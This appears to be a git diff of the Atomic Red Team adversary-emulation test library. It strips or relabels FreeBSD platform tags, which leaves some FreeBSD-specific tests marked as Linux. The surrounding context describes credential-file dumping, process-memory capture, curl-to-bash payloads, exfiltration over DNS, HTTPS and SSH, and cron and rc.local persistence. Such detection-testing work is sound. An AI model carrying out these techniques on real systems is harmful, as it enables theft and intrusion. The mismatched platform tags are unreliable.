description: Turn on Chrome/Chromium developer mode and Load Extension found
in the src directory
supported_platforms:
- freebsd
- linux
- windows
- macos
@@ -36521,7 +36494,6 @@ persistence:
auto_generated_guid: 4c83940d-8ca5-4bb2-8100-f46dc914bc3f
description: Install the "Minimum Viable Malicious Extension" Chrome extension
supported_platforms:
- freebsd
- linux
- windows
- macos
@@ -36538,7 +36510,6 @@ persistence:
'
supported_platforms:
- freebsd
- linux
- windows
- macos
@@ -39368,9 +39339,8 @@ persistence:
persistence on victim host. \nIf the user is able to save the same contents
in the authorized_keys file, it shows user can modify the file.\n"
supported_platforms:
- freebsd
- macos
- linux
- macos
executor:
name: sh
elevation_required: false
@@ -48279,7 +48249,6 @@ command-and-control:
'
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
@@ -48860,7 +48829,6 @@ command-and-control:
This test simulates an infected host beaconing to command and control.
Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/master/test-sets/command-and-control/malicious-user-agents.bat
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
@@ -48949,7 +48917,6 @@ command-and-control:
'
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
@@ -48989,7 +48956,6 @@ command-and-control:
'
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
@@ -49028,7 +48994,6 @@ command-and-control:
'
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
@@ -49059,7 +49024,6 @@ command-and-control:
'
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
@@ -49090,7 +49054,6 @@ command-and-control:
'
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
@@ -49121,7 +49084,6 @@ command-and-control:
'
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
@@ -49152,7 +49114,6 @@ command-and-control:
'
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
@@ -49342,9 +49303,8 @@ command-and-control:
Note that this test may conflict with pre-existing system configuration.
supported_platforms:
- freebsd
- macos
- linux
- macos
input_arguments:
proxy_server:
description: Proxy server URL (host:port)
@@ -49703,7 +49663,6 @@ collection:
'
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
@@ -49733,7 +49692,6 @@ collection:
'
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
@@ -49770,9 +49728,8 @@ collection:
'
supported_platforms:
- freebsd
- macos
- linux
- macos
input_arguments:
test_folder:
description: Path used to store files.
@@ -57401,9 +57358,8 @@ credential-access:
'
supported_platforms:
- freebsd
- macos
- linux
- macos
input_arguments:
search_path:
description: Path where to start searching from.
@@ -58320,7 +58276,6 @@ credential-access:
'
supported_platforms:
- freebsd
- macos
- linux
input_arguments:
@@ -58350,9 +58305,8 @@ credential-access:
'
supported_platforms:
- freebsd
- macos
- linux
- macos
input_arguments:
file_path:
description: Path to search
@@ -58370,9 +58324,8 @@ credential-access:
'
supported_platforms:
- freebsd
- macos
- linux
- macos
input_arguments:
file_path:
description: Path to search
@@ -60879,7 +60832,6 @@ discovery:
Upon successful execution, sh will stdout list of usernames.
supported_platforms:
- freebsd
- linux
- macos
executor:
@@ -61419,7 +61371,6 @@ discovery:
auto_generated_guid: fed9be70-0186-4bde-9f8a-20945f9370c2
description: "(requires root)\n"
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
@@ -61443,7 +61394,6 @@ discovery:
'
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
@@ -61466,7 +61416,6 @@ discovery:
'
supported_platforms:
- freebsd
- linux
- macos
executor:
@@ -61491,7 +61440,6 @@ discovery:
'
supported_platforms:
- freebsd
- linux
- macos
executor:
@@ -62144,7 +62092,6 @@ discovery:
'
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
@@ -62169,7 +62116,6 @@ discovery:
'
supported_platforms:
- freebsd
- linux
- macos
executor:
@@ -62184,9 +62130,8 @@ discovery:
'
supported_platforms:
- freebsd
- macos
- linux
- macos
executor:
command: 'env
@@ -63010,9 +62955,8 @@ discovery:
https://perishablepress.com/list-files-folders-recursively-terminal/
supported_platforms:
- freebsd
- macos
- linux
- macos
input_arguments:
output_file:
description: Output file used to store the results.
@@ -63038,9 +62982,8 @@ discovery:
'
supported_platforms:
- freebsd
- macos
- linux
- macos
input_arguments:
output_file:
description: Output file used to store the results.
@@ -63143,7 +63086,6 @@ discovery:
Upon successful execution, sh will execute `netstat` and `who -a`. Results will output via stdout.
supported_platforms:
- freebsd
- linux
- macos
dependency_executor_name: sh
@@ -63427,7 +63369,6 @@ discovery:
Upon successful execution, sh will execute ps and output to /tmp/loot.txt.
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
@@ -63579,9 +63520,8 @@ discovery:
'
supported_platforms:
- freebsd
- macos
- linux
- macos
executor:
command: |
if [ -x "$(command -v dscacheutil)" ]; then dscacheutil -q group; else echo "dscacheutil is missing from the machine. skipping..."; fi;
@@ -64099,7 +64039,6 @@ discovery:
Upon successful execution, sh will execute arp to list out the arp cache. Output will be via stdout.
supported_platforms:
- freebsd
- linux
- macos
dependency_executor_name: sh
@@ -64125,7 +64064,6 @@ discovery:
Upon successful execution, sh will perform a ping sweep on the 192.168.1.1/24 and echo via stdout if an IP is active.
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
@@ -64559,7 +64497,7 @@ discovery:
description: "Identify system time. Upon execution, the local computer system
time and timezone will be displayed. \n"
supported_platforms:
- freebsd
- linux
- macos
executor:
command: 'date
@@ -71126,9 +71064,8 @@ impact:
This test simulates a high CPU load as you might observe during cryptojacking attacks.
End the test by using CTRL/CMD+C to break.
supported_platforms:
- freebsd
- macos
- linux
- macos
executor:
command: 'yes > /dev/null
@@ -71291,7 +71228,6 @@ impact:
Overwrites and deletes a file using DD.
To stop the test, break the command with CTRL/CMD+C.
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
@@ -71690,9 +71626,8 @@ impact:
'
supported_platforms:
- freebsd
- macos
- linux
- macos
input_arguments:
timeout:
description: Time to restart (can be minutes or specific time)
@@ -71710,9 +71645,8 @@ impact:
'
supported_platforms:
- freebsd
- macos
- linux
- macos
input_arguments:
timeout:
description: Time to shutdown (can be minutes or specific time)
@@ -71730,9 +71664,8 @@ impact:
'
supported_platforms:
- freebsd
- macos
- linux
- macos
executor:
command: 'reboot
@@ -73844,7 +73777,6 @@ exfiltration:
supported_platforms:
- macos
- linux
- freebsd
input_arguments:
input_file:
description: Test file to upload
@@ -74001,7 +73933,6 @@ exfiltration:
supported_platforms:
- macos
- linux
- freebsd
input_arguments:
domain:
description: target SSH domain
@@ -74023,7 +73954,6 @@ exfiltration:
supported_platforms:
- macos
- linux
- freebsd
input_arguments:
user_name:
description: username for domain
@@ -74283,7 +74213,6 @@ exfiltration:
supported_platforms:
- macos
- linux
- freebsd
input_arguments:
file_name:
description: File name
@@ -74567,7 +74496,6 @@ exfiltration:
supported_platforms:
- macos
- linux
- freebsd
executor:
steps: |
1. Victim System Configuration:
-3
View File
@@ -51018,7 +51018,6 @@ persistence:
description: Turn on Chrome/Chromium developer mode and Load Extension found
in the src directory
supported_platforms:
- freebsd
- linux
- windows
- macos
@@ -51036,7 +51035,6 @@ persistence:
auto_generated_guid: 4c83940d-8ca5-4bb2-8100-f46dc914bc3f
description: Install the "Minimum Viable Malicious Extension" Chrome extension
supported_platforms:
- freebsd
- linux
- windows
- macos
@@ -51053,7 +51051,6 @@ persistence:
'
supported_platforms:
- freebsd
- linux
- windows
- macos
+2 -2
View File
@@ -85,7 +85,7 @@ Using `/proc/$PID/mem`, where $PID is the target process ID, use shell utilities
copy process memory to an external file so it can be searched or exfiltrated later.
On FreeBSD procfs must be mounted.
**Supported Platforms:** Freebsd
**Supported Platforms:** Linux
**auto_generated_guid:** fa37b633-e097-4415-b2b8-c5bf4c86e423
@@ -146,7 +146,7 @@ Using `/proc/$PID/mem`, where $PID is the target process ID, use a Python script
copy a process's heap memory to an external file so it can be searched or exfiltrated later.
On FreeBSD procfs must be mounted.
**Supported Platforms:** Freebsd, Linux
**Supported Platforms:** Linux
**auto_generated_guid:** 437b2003-a20d-4ed8-834c-4964f24eec63
+1 -2
View File
@@ -55,7 +55,7 @@ atomic_tests:
copy process memory to an external file so it can be searched or exfiltrated later.
On FreeBSD procfs must be mounted.
supported_platforms:
- freebsd
- linux
input_arguments:
output_file:
@@ -102,7 +102,6 @@ atomic_tests:
copy a process's heap memory to an external file so it can be searched or exfiltrated later.
On FreeBSD procfs must be mounted.
supported_platforms:
- freebsd
- linux
input_arguments:
+4 -4
View File
@@ -61,7 +61,7 @@ rm -f #{output_file}
## Atomic Test #2 - Access /etc/master.passwd (Local)
/etc/master.passwd file is accessed in FreeBSD environments
**Supported Platforms:** Freebsd
**Supported Platforms:** Linux
**auto_generated_guid:** 5076874f-a8e6-4077-8ace-9e5ab54114a5
@@ -99,7 +99,7 @@ rm -f #{output_file}
## Atomic Test #3 - Access /etc/passwd (Local)
/etc/passwd file is accessed in FreeBSD and Linux environments
**Supported Platforms:** Freebsd, Linux
**Supported Platforms:** Linux
**auto_generated_guid:** 60e860b6-8ae6-49db-ad07-5e73edd88f5d
@@ -137,7 +137,7 @@ rm -f #{output_file}
## Atomic Test #4 - Access /etc/{shadow,passwd,master.passwd} with a standard bin that's not cat
Dump /etc/passwd, /etc/master.passwd and /etc/shadow using ed
**Supported Platforms:** Freebsd, Linux
**Supported Platforms:** Linux
**auto_generated_guid:** df1a55ae-019d-4120-bc35-94f4bc5c4b0a
@@ -174,7 +174,7 @@ rm -f #{output_file}
## Atomic Test #5 - Access /etc/{shadow,passwd,master.passwd} with shell builtins
Dump /etc/passwd, /etc/master.passwd and /etc/shadow using sh builtins
**Supported Platforms:** Freebsd, Linux
**Supported Platforms:** Linux
**auto_generated_guid:** f5aa6543-6cb2-4fae-b9c2-b96e14721713
+1 -4
View File
@@ -25,7 +25,7 @@ atomic_tests:
description: |
/etc/master.passwd file is accessed in FreeBSD environments
supported_platforms:
- freebsd
- linux
input_arguments:
output_file:
description: Path where captured results will be placed
@@ -44,7 +44,6 @@ atomic_tests:
description: |
/etc/passwd file is accessed in FreeBSD and Linux environments
supported_platforms:
- freebsd
- linux
input_arguments:
output_file:
@@ -63,7 +62,6 @@ atomic_tests:
description: |
Dump /etc/passwd, /etc/master.passwd and /etc/shadow using ed
supported_platforms:
- freebsd
- linux
input_arguments:
output_file:
@@ -82,7 +80,6 @@ atomic_tests:
description: |
Dump /etc/passwd, /etc/master.passwd and /etc/shadow using sh builtins
supported_platforms:
- freebsd
- linux
input_arguments:
output_file:
+1 -1
View File
@@ -119,7 +119,7 @@ systemctl --type=service
## Atomic Test #4 - System Service Discovery - service
Enumerates system service using service
**Supported Platforms:** Freebsd
**Supported Platforms:** Linux
**auto_generated_guid:** b2e1c734-7336-40f9-b970-b04731cbaf8a
+1 -1
View File
@@ -50,7 +50,7 @@ atomic_tests:
description: |
Enumerates system service using service
supported_platforms:
- freebsd
- linux
executor:
command: |
service -e
+1 -1
View File
@@ -145,7 +145,7 @@ Identify network configuration information.
Upon successful execution, sh will spawn multiple commands and output will be via stdout.
**Supported Platforms:** Freebsd
**Supported Platforms:** Linux
**auto_generated_guid:** 7625b978-4efd-47de-8744-add270374bee
+1 -1
View File
@@ -60,7 +60,7 @@ atomic_tests:
Upon successful execution, sh will spawn multiple commands and output will be via stdout.
supported_platforms:
- freebsd
- linux
executor:
command: |
if [ -x "$(command -v arp)" ]; then arp -a; else echo "arp is missing from the machine. skipping..."; fi;
+3 -3
View File
@@ -222,7 +222,7 @@ Identify remote systems via arp.
Upon successful execution, sh will execute arp to list out the arp cache. Output will be via stdout.
**Supported Platforms:** Freebsd, Linux, macOS
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** acb6b1ff-e2ad-4d64-806c-6c35fe73b951
@@ -264,7 +264,7 @@ Identify remote systems via ping sweep.
Upon successful execution, sh will perform a ping sweep on the 192.168.1.1/24 and echo via stdout if an IP is active.
**Supported Platforms:** Freebsd, Linux, macOS
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** 96db2632-8417-4dbb-b8bb-a8b92ba391de
@@ -565,7 +565,7 @@ apt-get install iproute2 -y
## Atomic Test #14 - Remote System Discovery - netstat
Use the netstat command to display the kernels routing tables.
**Supported Platforms:** Freebsd
**Supported Platforms:** Linux
**auto_generated_guid:** d2791d72-b67f-4615-814f-ec824a91f514
+1 -3
View File
@@ -87,7 +87,6 @@ atomic_tests:
Upon successful execution, sh will execute arp to list out the arp cache. Output will be via stdout.
supported_platforms:
- freebsd
- linux
- macos
dependency_executor_name: sh
@@ -109,7 +108,6 @@ atomic_tests:
Upon successful execution, sh will perform a ping sweep on the 192.168.1.1/24 and echo via stdout if an IP is active.
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
@@ -277,7 +275,7 @@ atomic_tests:
description: |
Use the netstat command to display the kernels routing tables.
supported_platforms:
- freebsd
- linux
executor:
command: |
netstat -r | grep default
+2 -2
View File
@@ -18,7 +18,7 @@ Uses dd to add a zero byte, high-quality random data, and low-quality random dat
Upon successful execution, dd will modify `/tmp/evil-binary`, therefore the expected hash will change.
**Supported Platforms:** Freebsd, macOS, Linux
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** ffe2346c-abd5-4b45-a713-bf5f1ebd573a
@@ -71,7 +71,7 @@ Uses truncate to add a byte to the binary to change the hash.
Upon successful execution, truncate will modify `/tmp/evil-binary`, therefore the expected hash will change.
**Supported Platforms:** Freebsd, macOS, Linux
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** e22a9e89-69c7-410f-a473-e6c212cd2292
+2 -4
View File
@@ -8,9 +8,8 @@ atomic_tests:
Upon successful execution, dd will modify `/tmp/evil-binary`, therefore the expected hash will change.
supported_platforms:
- freebsd
- macos
- linux
- macos
input_arguments:
file_to_pad:
description: Path of binary to be padded
@@ -40,9 +39,8 @@ atomic_tests:
Upon successful execution, truncate will modify `/tmp/evil-binary`, therefore the expected hash will change.
supported_platforms:
- freebsd
- macos
- linux
- macos
input_arguments:
file_to_pad:
description: Path of binary to be padded
+3 -3
View File
@@ -122,7 +122,7 @@ Invoke-WebRequest https://github.com/redcanaryco/atomic-red-team/raw/master/atom
## Atomic Test #3 - C compile
Compile a c file with either gcc or clang on FreeBSD, Linux or Macos.
**Supported Platforms:** Freebsd, Linux, macOS
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** d0377aa6-850a-42b2-95f0-de558d80be57
@@ -168,7 +168,7 @@ wget https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027.004
## Atomic Test #4 - CC compile
Compile a c file with either gcc or clang on FreeBSD, Linux or Macos.
**Supported Platforms:** Freebsd, Linux, macOS
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** da97bb11-d6d0-4fc1-b445-e443d1346efe
@@ -214,7 +214,7 @@ wget https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027.004
## Atomic Test #5 - Go compile
Compile a go file with golang on FreeBSD, Linux or Macos.
**Supported Platforms:** Freebsd, Linux, macOS
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** 78bd3fa7-773c-449e-a978-dc1f1500bc52
-3
View File
@@ -64,7 +64,6 @@ atomic_tests:
description: |
Compile a c file with either gcc or clang on FreeBSD, Linux or Macos.
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
@@ -90,7 +89,6 @@ atomic_tests:
description: |
Compile a c file with either gcc or clang on FreeBSD, Linux or Macos.
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
@@ -116,7 +114,6 @@ atomic_tests:
description: |
Compile a go file with golang on FreeBSD, Linux or Macos.
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
+1 -1
View File
@@ -96,7 +96,7 @@ Creates a base64-encoded data file and decodes it into an executable shell scrip
Upon successful execution, sh will execute art.sh, which is a base64 encoded command, that echoes `Hello from the Atomic Red Team`
and uname -v
**Supported Platforms:** Freebsd
**Supported Platforms:** Linux
**auto_generated_guid:** 197ed693-08e6-4958-bfd8-5974e291be6c
+1 -1
View File
@@ -41,7 +41,7 @@ atomic_tests:
Upon successful execution, sh will execute art.sh, which is a base64 encoded command, that echoes `Hello from the Atomic Red Team`
and uname -v
supported_platforms:
- freebsd
- linux
input_arguments:
shell_command:
description: command to encode
+1 -1
View File
@@ -12,7 +12,7 @@
## Atomic Test #1 - Data Transfer Size Limits
Take a file/directory, split it into 5Mb chunks
**Supported Platforms:** macOS, Linux, Freebsd
**Supported Platforms:** macOS, Linux
**auto_generated_guid:** ab936c51-10f4-46ce-9144-e02137b2016a
-1
View File
@@ -8,7 +8,6 @@ atomic_tests:
supported_platforms:
- macos
- linux
- freebsd
input_arguments:
file_name:
description: File name
+1 -1
View File
@@ -71,7 +71,7 @@ Identify System owner or users on an endpoint
Upon successful execution, sh will stdout list of usernames.
**Supported Platforms:** Freebsd, Linux, macOS
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** 2a9b677d-a230-44f4-ad86-782df1ef108c
-1
View File
@@ -33,7 +33,6 @@ atomic_tests:
Upon successful execution, sh will stdout list of usernames.
supported_platforms:
- freebsd
- linux
- macos
executor:
+1 -1
View File
@@ -65,7 +65,7 @@ Copies sh process, renames it as crond, and executes it to masquerade as the cro
Upon successful execution, sh is renamed to `crond` and executed.
**Supported Platforms:** Freebsd, Linux
**Supported Platforms:** Linux
**auto_generated_guid:** a315bfff-7a98-403b-b442-2ea1b255e556
-1
View File
@@ -23,7 +23,6 @@ atomic_tests:
Upon successful execution, sh is renamed to `crond` and executed.
supported_platforms:
- freebsd
- linux
executor:
command: |
+1 -1
View File
@@ -16,7 +16,7 @@ Adversaries may also use the same icon of the file they are trying to mimic.</bl
## Atomic Test #1 - Execute a process from a directory masquerading as the current parent directory.
Create and execute a process from a directory masquerading as the current parent directory (`...` instead of normal `..`)
**Supported Platforms:** macOS, Linux, Freebsd
**Supported Platforms:** macOS, Linux
**auto_generated_guid:** 812c3ab8-94b0-4698-a9bf-9420af23ce24
-1
View File
@@ -8,7 +8,6 @@ atomic_tests:
supported_platforms:
- macos
- linux
- freebsd
input_arguments:
test_message:
description: Test message to echo out to the screen
+1 -1
View File
@@ -85,7 +85,7 @@ rm -rf /tmp/atomic-test-T1036.006
## Atomic Test #3 - Space After Filename (FreeBSD)
Space after filename.
**Supported Platforms:** Freebsd
**Supported Platforms:** Linux
**auto_generated_guid:** cfc1fbb5-caae-4f4c-bfa8-1b7c8b5cc4e8
+1 -1
View File
@@ -38,7 +38,7 @@ atomic_tests:
description: |
Space after filename.
supported_platforms:
- freebsd
- linux
executor:
name: sh
command: |
+1 -1
View File
@@ -126,7 +126,7 @@ origfilename='/etc/rc.local.original';if [ ! -f $origfilename ];then sudo rm /et
## Atomic Test #4 - rc.local (FreeBSD)
Modify rc.local
**Supported Platforms:** Freebsd
**Supported Platforms:** Linux
**auto_generated_guid:** 2015fb48-8ab6-4fbf-928b-0b62de5c9476
+1 -1
View File
@@ -59,7 +59,7 @@ atomic_tests:
Modify rc.local
supported_platforms:
- freebsd
- linux
executor:
name: sh
elevation_required: true
+3 -3
View File
@@ -98,7 +98,7 @@ Perform a PCAP. Wireshark will be required for tshark. TCPdump may already be in
Upon successful execution, tshark or tcpdump will execute and capture 5 packets on interface ens33.
**Supported Platforms:** Freebsd
**Supported Platforms:** Linux
**auto_generated_guid:** c93f2492-9ebe-44b5-8b45-36574cccfe67
@@ -463,7 +463,7 @@ cc #{csource_path} -o #{program_path}
## Atomic Test #10 - Packet Capture FreeBSD using /dev/bpfN with sudo
Opens a /dev/bpf file (O_RDONLY) and captures packets for a few seconds.
**Supported Platforms:** Freebsd
**Supported Platforms:** Linux
**auto_generated_guid:** e2028771-1bfb-48f5-b5e6-e50ee0942a14
@@ -514,7 +514,7 @@ cc #{csource_path} -o #{program_path}
## Atomic Test #11 - Filtered Packet Capture FreeBSD using /dev/bpfN with sudo
Opens a /dev/bpf file (O_RDONLY), sets BPF filter for 'udp' and captures packets for a few seconds.
**Supported Platforms:** Freebsd
**Supported Platforms:** Linux
**auto_generated_guid:** a3a0d4c9-c068-4563-a08d-583bd05b884c
+3 -3
View File
@@ -35,7 +35,7 @@ atomic_tests:
Upon successful execution, tshark or tcpdump will execute and capture 5 packets on interface ens33.
supported_platforms:
- freebsd
- linux
input_arguments:
interface:
description: Specify interface to perform PCAP on.
@@ -254,7 +254,7 @@ atomic_tests:
description: |
Opens a /dev/bpf file (O_RDONLY) and captures packets for a few seconds.
supported_platforms:
- freebsd
- linux
input_arguments:
ifname:
description: Specify interface to perform PCAP on.
@@ -288,7 +288,7 @@ atomic_tests:
description: |
Opens a /dev/bpf file (O_RDONLY), sets BPF filter for 'udp' and captures packets for a few seconds.
supported_platforms:
- freebsd
- linux
input_arguments:
ifname:
description: Specify interface to perform PCAP on.
+1 -1
View File
@@ -142,7 +142,7 @@ Scan ports to check for listening ports with Nmap.
Upon successful execution, sh will utilize nmap, telnet, and nc to contact a single or range of addresses on port 80 to determine if listening. Results will be via stdout.
**Supported Platforms:** Freebsd
**Supported Platforms:** Linux
**auto_generated_guid:** f03d59dc-0e3b-428a-baeb-3499552c7048
+2 -2
View File
@@ -69,13 +69,13 @@ atomic_tests:
name: sh
elevation_required: true
- name: Port Scan Nmap for FreeBSD
auto_generated_guid: f03d59dc-0e3b-428a-baeb-3499552c7048
auto_generated_guid: f03d59dc-0e3b-428a-baeb-3499552c7048
description: |
Scan ports to check for listening ports with Nmap.
Upon successful execution, sh will utilize nmap, telnet, and nc to contact a single or range of addresses on port 80 to determine if listening. Results will be via stdout.
supported_platforms:
- freebsd
- linux
input_arguments:
host:
description: Host to scan.
+1 -1
View File
@@ -77,7 +77,7 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #2 - Exfiltrate data HTTPS using curl freebsd,linux or macos
Exfiltrate data HTTPS using curl to file share site file.io
**Supported Platforms:** macOS, Linux, Freebsd
**Supported Platforms:** macOS, Linux
**auto_generated_guid:** 4a4f31e2-46ea-4c26-ad89-f09ad1d5fe01
-1
View File
@@ -46,7 +46,6 @@ atomic_tests:
supported_platforms:
- macos
- linux
- freebsd
input_arguments:
input_file:
description: Test file to upload
+3 -3
View File
@@ -32,7 +32,7 @@ A firewall rule (ipfw,pf,iptables or firewalld) will be needed to allow exfiltra
Upon successful execution, sh will be used to make a directory (/tmp/victim-staging-area), write a txt file, and host the directory with Python on port 1337, to be later downloaded.
**Supported Platforms:** macOS, Linux, Freebsd
**Supported Platforms:** macOS, Linux
**auto_generated_guid:** 1d1abbd6-a3d3-4b2e-bef5-c59293f46eff
@@ -104,7 +104,7 @@ $ping = New-Object System.Net.Networkinformation.ping; foreach($Data in Get-Cont
## Atomic Test #3 - Exfiltration Over Alternative Protocol - DNS
Exfiltration of specified file over DNS protocol.
**Supported Platforms:** Freebsd, Linux
**Supported Platforms:** Linux
**auto_generated_guid:** c403b5a4-b5fc-49f2-b181-d1c80d27db45
@@ -358,7 +358,7 @@ if [ $(which python3) ]; then cd /tmp; python3 -m http.server 9090 & PID=$!; sle
## Atomic Test #9 - Python3 http.server (freebsd)
An adversary may use the python3 standard library module http.server to exfiltrate data. This test checks if python3.9 is available and if so, creates a HTTP server on port 9090, captures the PID, sleeps for 10 seconds, then kills the PID and unsets the $PID variable.
**Supported Platforms:** Freebsd
**Supported Platforms:** Linux
**auto_generated_guid:** 57a303a2-0bc6-400d-b144-4f3292920a0b
+1 -3
View File
@@ -10,7 +10,6 @@ atomic_tests:
supported_platforms:
- macos
- linux
- freebsd
executor:
steps: |
1. Victim System Configuration:
@@ -53,7 +52,6 @@ atomic_tests:
description: |
Exfiltration of specified file over DNS protocol.
supported_platforms:
- freebsd
- linux
executor:
steps: |
@@ -223,7 +221,7 @@ atomic_tests:
description: |
An adversary may use the python3 standard library module http.server to exfiltrate data. This test checks if python3.9 is available and if so, creates a HTTP server on port 9090, captures the PID, sleeps for 10 seconds, then kills the PID and unsets the $PID variable.
supported_platforms:
- freebsd
- linux
executor:
name: sh
elevation_required: false
+2 -2
View File
@@ -26,7 +26,7 @@ Remote to Local
Upon successful execution, sh will spawn ssh contacting a remote domain (default: target.example.com) writing a tar.gz file.
**Supported Platforms:** macOS, Linux, Freebsd
**Supported Platforms:** macOS, Linux
**auto_generated_guid:** f6786cc8-beda-4915-a4d6-ac2f193bb988
@@ -63,7 +63,7 @@ Local to Remote
Upon successful execution, tar will compress /Users/* directory and password protect the file modification of `Users.tar.gz.enc` as output.
**Supported Platforms:** macOS, Linux, Freebsd
**Supported Platforms:** macOS, Linux
**auto_generated_guid:** 7c3cb337-35ae-4d06-bf03-3032ed2ec268
-2
View File
@@ -12,7 +12,6 @@ atomic_tests:
supported_platforms:
- macos
- linux
- freebsd
input_arguments:
domain:
description: target SSH domain
@@ -33,7 +32,6 @@ atomic_tests:
supported_platforms:
- macos
- linux
- freebsd
input_arguments:
user_name:
description: username for domain
+1 -1
View File
@@ -86,7 +86,7 @@ Get a listing of network connections.
Upon successful execution, sh will execute `netstat` and `who -a`. Results will output via stdout.
**Supported Platforms:** Freebsd, Linux, macOS
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** 9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2
-1
View File
@@ -34,7 +34,6 @@ atomic_tests:
Upon successful execution, sh will execute `netstat` and `who -a`. Results will output via stdout.
supported_platforms:
- freebsd
- linux
- macos
dependency_executor_name: sh
+1 -1
View File
@@ -108,7 +108,7 @@ echo 'Please start the `atd` daemon (sysv: `service atd start` ; systemd: `syste
## Atomic Test #3 - At - Schedule a job freebsd
This test submits a command to be run in the future by the `at` daemon.
**Supported Platforms:** Freebsd
**Supported Platforms:** Linux
**auto_generated_guid:** 549863fb-1c91-467e-97fc-1fa32b9f356b
+1 -1
View File
@@ -60,7 +60,7 @@ atomic_tests:
This test submits a command to be run in the future by the `at` daemon.
supported_platforms:
- freebsd
- linux
input_arguments:
time_spec:
+2 -2
View File
@@ -20,7 +20,7 @@ An adversary may use <code>cron</code> in Linux or Unix environments to execute
## Atomic Test #1 - Cron - Replace crontab with referenced file
This test replaces the current user's crontab file with the contents of the referenced file. This technique was used by numerous IoT automated exploitation attacks.
**Supported Platforms:** Freebsd, macOS, Linux
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** 435057fb-74b1-410e-9403-d81baf194f75
@@ -103,7 +103,7 @@ rm /etc/cron.weekly/#{cron_script_name}
## Atomic Test #3 - Cron - Add script to /etc/cron.d folder
This test adds a script to /etc/cron.d folder configured to execute on a schedule.
**Supported Platforms:** Freebsd
**Supported Platforms:** Linux
**auto_generated_guid:** 078e69eb-d9fb-450e-b9d0-2e118217c846
+2 -3
View File
@@ -6,9 +6,8 @@ atomic_tests:
description: |
This test replaces the current user's crontab file with the contents of the referenced file. This technique was used by numerous IoT automated exploitation attacks.
supported_platforms:
- freebsd
- macos
- linux
- macos
input_arguments:
command:
description: Command to execute
@@ -59,7 +58,7 @@ atomic_tests:
description: |
This test adds a script to /etc/cron.d folder configured to execute on a schedule.
supported_platforms:
- freebsd
- linux
input_arguments:
command:
description: Command to execute
+2 -2
View File
@@ -194,7 +194,7 @@ There are several variables that can be set to control the appearance of the bas
To gain persistence the command could be added to the users .shrc or .profile
**Supported Platforms:** Freebsd
**Supported Platforms:** Linux
**auto_generated_guid:** b04284dc-3bd9-4840-8d21-61b8d31c99f2
@@ -243,7 +243,7 @@ When a command is executed in bash, the BASH_COMMAND variable contains that comm
To gain persistence the command could be added to the users .bashrc or .bash_aliases or the systems default .bashrc in /etc/skel/
**Supported Platforms:** Freebsd, Linux
**Supported Platforms:** Linux
**auto_generated_guid:** 7f85a946-a0ea-48aa-b6ac-8ff539278258
+1 -2
View File
@@ -95,7 +95,7 @@ atomic_tests:
To gain persistence the command could be added to the users .shrc or .profile
supported_platforms:
- freebsd
- linux
dependency_executor_name: sh
dependencies:
- description: |
@@ -121,7 +121,6 @@ atomic_tests:
To gain persistence the command could be added to the users .bashrc or .bash_aliases or the systems default .bashrc in /etc/skel/
supported_platforms:
- freebsd
- linux
dependency_executor_name: sh
dependencies:
+1 -1
View File
@@ -28,7 +28,7 @@ Utilize ps to identify processes.
Upon successful execution, sh will execute ps and output to /tmp/loot.txt.
**Supported Platforms:** Freebsd, Linux, macOS
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** 4ff64f0b-aaf2-4866-b39d-38d9791407cc
-1
View File
@@ -8,7 +8,6 @@ atomic_tests:
Upon successful execution, sh will execute ps and output to /tmp/loot.txt.
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
+10 -10
View File
@@ -48,7 +48,7 @@ Adversaries may abuse Unix shells to execute various commands or payloads. Inter
## Atomic Test #1 - Create and Execute Bash Shell Script
Creates and executes a simple sh script.
**Supported Platforms:** Freebsd, Linux, macOS
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** 7e7ac3ed-f795-4fa5-b711-09d6fbe9b873
@@ -90,7 +90,7 @@ Using Curl to download and pipe a payload to Bash. NOTE: Curl-ing to Bash is gen
Upon successful execution, sh will download via curl and wget the specified payload (echo-art-fish.sh) and set a marker file in `/tmp/art-fish.txt`.
**Supported Platforms:** Freebsd, Linux, macOS
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** d0c88567-803d-4dca-99b4-7ce65e7b257c
@@ -225,7 +225,7 @@ curl --create-dirs #{linenum_url} --output #{linenum}
## Atomic Test #5 - New script file in the tmp directory
An attacker may create script files in the /tmp directory using the mktemp utility and execute them. The following commands creates a temp file and places a pointer to it in the variable $TMPFILE, echos the string id into it, and then executes the file using bash, which results in the id command being executed.
**Supported Platforms:** Freebsd, Linux
**Supported Platforms:** Linux
**auto_generated_guid:** 8cd1947b-4a54-41fb-b5ea-07d0ace04f81
